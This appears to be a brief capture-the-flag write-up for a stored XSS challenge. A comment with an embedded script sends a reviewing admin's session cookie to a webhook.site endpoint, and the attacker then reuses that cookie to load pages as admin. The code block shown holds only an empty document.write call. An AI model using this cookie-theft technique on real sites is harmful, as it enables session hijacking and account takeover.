# XSS Cookie-Jacking

Starts with a simple login and forum. Account creation is required, and then you can visit `/post/1` and leave a comment. Comments are audited by the Admin user and there is **no** web-form sanitization.

Make a comment with embedded <script> which forward the Admin to a [webhook](https://webhook.site/) once they click your comment's link.

```
<script> document.write(''); </script>
```

This will forward the Admin's session cookie (x-wing) and you can now load the challenge webpage as Admin by replacing your request session cookie (x-wing) with the Admin's.